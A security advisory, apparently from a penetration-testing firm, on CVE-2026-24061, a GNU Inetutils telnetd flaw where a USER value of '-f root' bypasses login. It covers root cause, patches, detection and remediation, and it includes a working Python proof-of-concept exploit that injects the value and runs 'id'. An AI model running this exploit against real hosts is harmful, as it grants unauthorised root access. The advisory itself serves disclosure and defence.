Key takeaways
- CVE-2026-24061 lets an unauthenticated network client turn the Telnet USER value into the `login(1)` option `-f root`, opening a root session without a password.
- GNU Inetutils versions 1.9.3 through 2.7 are affected, and upstream release 2.8 contains the fix.
- The first patch rejected dangerous USER values, while the follow-up applied the same sanitizer to every telnetd variable expansion.
- CISA lists the flaw in the Known Exploited Vulnerabilities catalog, and GreyNoise recorded exploitation followed by reconnaissance and persistence attempts.
- The strongest response is to remove telnetd. Where that cannot happen immediately, patch, restrict TCP port 23 and hunt for `USER=-f` negotiation patterns.
Why this root bypass matters
CVE-2026-24061 is a remote authentication bypass in GNU Inetutils telnetd. A client that can reach the service can supply -f root as the Telnet USER environment value. The daemon passes that text into the command line for login(1), which interprets -f as its pre-authenticated-user option. No valid account, password or user interaction is required. The CVE record assigns CVSS 3.1 score 9.8 and classifies the weakness as CWE-88 argument injection.
The affected upstream versions are Inetutils 1.9.3 through 2.7 inclusive. GNU's security advisory traces the vulnerable behavior to a 2015 change and demonstrates the bypass with the standard Telnet client. For an exposed server, the first successful packet sequence can end at a root shell, which is why external service discovery belongs in an infrastructure pentest rather than in a version-only inventory.
| Field | Value | Operational meaning |
|---|---|---|
| Affected product | GNU Inetutils telnetd 1.9.3 to 2.7 | Only systems running the Inetutils Telnet server are in this upstream scope |
| Attack position | Network, no privileges | Reachability to the Telnet service is the main prerequisite |
| Trigger | USER environment value -f root | Attacker-controlled text becomes a login option |
| Primitive | Pre-authenticated root login | The password check is skipped before the shell starts |
| Fixed upstream | GNU Inetutils 2.8 | Upgrade or use a distribution package carrying the patches |
How a USER variable becomes a login option
The trust boundary failure sits between the Telnet protocol and the local authentication program. The client sends environment data through Telnet NEW-ENVIRON negotiation. In telnetd/utility.c, _var_short_name() handles the %U expansion by reading getenv("USER"). Before the fix it returned that string unchanged. The login_invocation template in telnetd/telnetd.c then placed %U at the end of the command used to start login(1).
A normal value such as operator remains a username. A value beginning with -f crosses the boundary differently because login(1) parses it as an option, not as account data. The GNU advisory identifies -f root as the direct bypass. This is argument injection rather than shell command injection: a shell metacharacter is not needed, because the dangerous syntax belongs to the called program's own option parser. A penetration test that validates this class of flaw must follow the data into the child process rather than stop at the network field name.
Network input
Telnet connects
The service is reachable on its configured port
USER is supplied
NEW-ENVIRON carries the value -f root
Process boundary
%U expands
utility.c returns the client value unchanged
login starts
The value lands in the child process argument list
Auth is skipped
login treats -f root as pre-authenticated
What the two patches change
The initial patch changes the %U branch in _var_short_name(). It reads the USER value, rejects a leading hyphen, rejects whitespace and a defined set of shell metacharacters, and substitutes an empty string when the value is unsafe. The leading-hyphen check directly blocks -f root, while the character test narrows other argument and command-building cases.
The follow-up patch extracts that rule into sanitize() and applies it to every short variable expansion, including hostnames, line data, terminal type, authenticated user name and USER. That wider change matters because the command template expands more than one field. GNU later shipped the work in Inetutils 2.8, whose release notes explicitly name CVE-2026-24061.
Reject leading hyphens
Stops a value from becoming a login option
Reject unsafe characters
Drops whitespace and command-building metacharacters
Sanitize every expansion
One helper covers USER, host, terminal and line values
Ship in version 2.8
The upstream stable release includes the CVE fix
Authorised validation reaches the primitive in one step
The PoC below is an independent RedTeam Security implementation of the minimum Telnet negotiation needed to validate the issue. We reviewed the public implementations by Ali Guliyev and Furkan Kayapinar as protocol evidence, then removed their interactive session handling and wrote a bounded parser that sends one id command. RedTeam Security has not executed this code. Use it only against an isolated host you own or are explicitly authorised to test.
The success condition is the returned identity, not an open TCP connection. A vulnerable system should return output where id reports UID 0. A fixed build sanitizes the supplied value before constructing the login invocation, so the same input does not become the -f option. This before-and-after check suits an authorised Red Team engagement when legacy exposure is already known. Routine internet scanning should stop at safe service identification.
# Authorized Testing Only, PoC by RedTeam Security
# CVE-2026-24061: GNU Inetutils telnetd USER=-f root auth bypass via NEW-ENVIRON.
# Vulnerability research by Kyu Neushwaistein.
# Protocol mechanics informed by public implementations by Ali Guliyev and Furkan Kayapinar.
# This RedTeam implementation is untested and requires an authorised lab target.
import argparse, socket, sys
IAC, SB, SE, WILL, WONT, DO, DONT = 0xFF, 0xFA, 0xF0, 0xFB, 0xFC, 0xFD, 0xFE
NEW_ENVIRON, _IS, _VAR, _VALUE = 39, 0, 0, 1
CONNECT_TO, READ_TO, MAX_RESP = 8, 6, 4096
def _reply3(sock, cmd, opt):
if cmd == DO and opt == NEW_ENVIRON:
sock.sendall(bytes([IAC, WILL, NEW_ENVIRON]))
elif cmd == DO:
sock.sendall(bytes([IAC, WONT, opt]))
elif cmd == WILL:
sock.sendall(bytes([IAC, DO, opt]))
def _send_environ(sock):
sock.sendall(
bytes([IAC, SB, NEW_ENVIRON, _IS, _VAR]) + b"USER" +
bytes([_VALUE]) + b"-f root" + bytes([IAC, SE])
)
def negotiate(sock):
buf, environ_sent = bytearray(), False
while not environ_sent:
chunk = sock.recv(1024)
if not chunk:
break
buf.extend(chunk)
i = 0
while i < len(buf):
if buf[i] != IAC:
i += 1
continue
if i + 1 >= len(buf):
break
cmd = buf[i + 1]
if cmd in (DO, DONT, WILL, WONT):
if i + 2 >= len(buf):
break
_reply3(sock, cmd, buf[i + 2])
i += 3
elif cmd == SB:
j = i + 2
while j < len(buf) - 1:
if buf[j] == IAC and buf[j + 1] == SE:
break
j += 1
if j >= len(buf) - 1:
break
if i + 2 < len(buf) and buf[i + 2] == NEW_ENVIRON:
_send_environ(sock)
environ_sent = True
i = j + 2
else:
i += 2
buf = buf[i:]
def main():
ap = argparse.ArgumentParser(description="CVE-2026-24061 validation PoC")
ap.add_argument("-t", "--target", required=True, help="Target hostname or IP")
ap.add_argument("-p", "--port", type=int, default=23, help="Telnet port (default 23)")
args = ap.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(CONNECT_TO)
try:
sock.connect((args.target, args.port))
except OSError as exc:
sys.exit(f"connect failed: {exc}")
sock.settimeout(READ_TO)
negotiate(sock)
sock.sendall(b"id\r\n")
response = bytearray()
try:
while len(response) < MAX_RESP:
chunk = sock.recv(256)
if not chunk:
break
response.extend(chunk)
except socket.timeout:
pass
finally:
sock.close()
sys.stdout.buffer.write(bytes(response) + b"\n")
if __name__ == "__main__":
main()Active exploitation leaves a protocol and shell trail
CISA added CVE-2026-24061 to the Known Exploited Vulnerabilities catalog. GreyNoise's sensor analysis recorded Telnet sessions carrying USER.-f root, followed in some cases by system discovery, attempts to write SSH keys and attempted second-stage downloads. Those observations support treating an exposed vulnerable service as an incident lead, not only as a patch ticket.
Network detection can inspect Telnet NEW-ENVIRON subnegotiation for a USER value beginning with -f, while host detection can correlate a Telnet connection with a root shell and commands such as id, uname, reads of /etc/passwd, or changes under root's SSH directory. Do not limit a rule to the literal root username because observed probes also tested service accounts. An adversary simulation can replay the negotiation safely against a lab image, and a purple team session can verify that the protocol alert joins to process and account telemetry.
Remove the service, patch the boundary and verify exposure
The preferred remediation is to disable telnetd and replace it with an encrypted, maintained administration path. If the service is still required, upgrade to Inetutils 2.8 or a distribution package that carries both fixes. Until then, restrict the listening port to explicit management sources and verify that an unexpected interface or firewall rule has not made it public. An assumed-breach exercise is appropriate when logs show a successful session, because the attacker may already have obtained the highest local privilege.
The strongest MITRE ATT&CK mapping is Initial Access through T1190, Exploit Public-Facing Application. The attacker exploits a network-facing service to enter the host directly. Post-exploitation commands may map to other techniques, but they describe what an operator did after the bypass and should not replace the primary classification. Credit for discovery belongs to Kyu Neushwaistein, also known as Carlos Cortes Alvarez. Paul Eggert wrote the initial patch, and Simon Josefsson extended the sanitizer and drafted the advisory.
What UAE infrastructure teams should do now
For infrastructure teams in Dubai and Abu Dhabi, the practical question is not whether Telnet is meant to be public. It is whether an inherited appliance, recovery interface or old management segment still exposes GNU Inetutils telnetd somewhere the inventory does not show. Search externally reachable address space and internal management networks for TCP port 23, identify the daemon and package provenance, and compare the installed package with the vendor or distribution fix. Do not use the exploit against an unknown system merely to identify it.
Across the UAE, organisations operating regulated or sensitive environments need a defensible record of exposure, containment and remediation. Keep the discovery result, firewall change, package update and post-fix validation together. If logs show USER=-f, a root session or follow-on commands, move the case from vulnerability management into incident handling and preserve Telnet, process and authentication telemetry. A targeted security assessment can confirm that the legacy service is gone from the paths an external attacker or compromised internal host could reach.
Frequently asked questions
What is CVE-2026-24061?
CVE-2026-24061 is a remote authentication bypass in GNU Inetutils telnetd. A network client can send `-f root` as the Telnet USER environment value, causing the local login program to skip password authentication and start a root session.
Which GNU Inetutils versions are affected by CVE-2026-24061?
The published CVE record and GNU advisory identify versions 1.9.3 through 2.7 inclusive as affected. GNU Inetutils 2.8 includes the upstream fix, although distribution package versions may use backported patches and should be checked against the distributor's advisory.
How does CVE-2026-24061 differ from ordinary password guessing?
Password guessing repeatedly tests credentials through the intended authentication flow. CVE-2026-24061 changes how the username is parsed, turning attacker-controlled text into the `login(1)` option that marks a user as already authenticated. No password is guessed or validated.
Does exploitation require an existing user account?
No valid credentials are required. The public reproduction targets root directly by supplying `-f root`, and the CVSS vector records privileges required as none. The attacker still needs network reachability to the vulnerable telnetd service.
Is CVE-2026-24061 being exploited in the wild?
Yes. CISA lists the issue in the Known Exploited Vulnerabilities catalog, and GreyNoise published packet-level observations of exploitation attempts followed by reconnaissance and persistence activity. Treat evidence of a successful vulnerable session as a possible compromise.
What is the safest mitigation for the Inetutils telnetd flaw?
Disable telnetd wherever possible because Telnet provides no transport encryption and the daemon is rarely necessary on a modern system. Where it must remain, install Inetutils 2.8 or a patched distribution package and limit network access to trusted management sources.
How can defenders detect the authentication bypass?
Inspect Telnet NEW-ENVIRON negotiation for a USER value beginning with `-f`, then correlate the connection with a root shell or immediate discovery commands. Also review root SSH-key changes and outbound downloads, which were observed after some public exploitation attempts.
Why were two patches needed?
The first patch protected the USER expansion that carried the known payload. The second introduced one sanitizer and applied it to all telnetd variable expansions, reducing the chance that another client-controlled field could reach the same command-building boundary unsafely.






